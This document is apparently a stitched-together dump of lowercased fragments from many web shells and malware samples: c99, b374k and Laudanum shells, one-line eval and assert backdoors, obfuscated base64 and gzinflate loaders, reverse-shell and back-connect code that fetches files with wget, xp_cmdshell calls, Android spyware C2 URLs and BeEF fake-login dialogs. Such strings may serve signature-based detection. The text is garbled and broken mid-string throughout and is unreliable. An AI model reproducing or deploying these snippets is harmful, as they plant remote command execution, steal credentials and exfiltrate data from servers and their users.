to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. 
/file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package 
wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which 
wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 
alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? 
$_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . 
urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], 
$_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . 
$dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" 
value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . 
$_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' 
- antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? 
eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! 
can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and 
directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' 
of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version 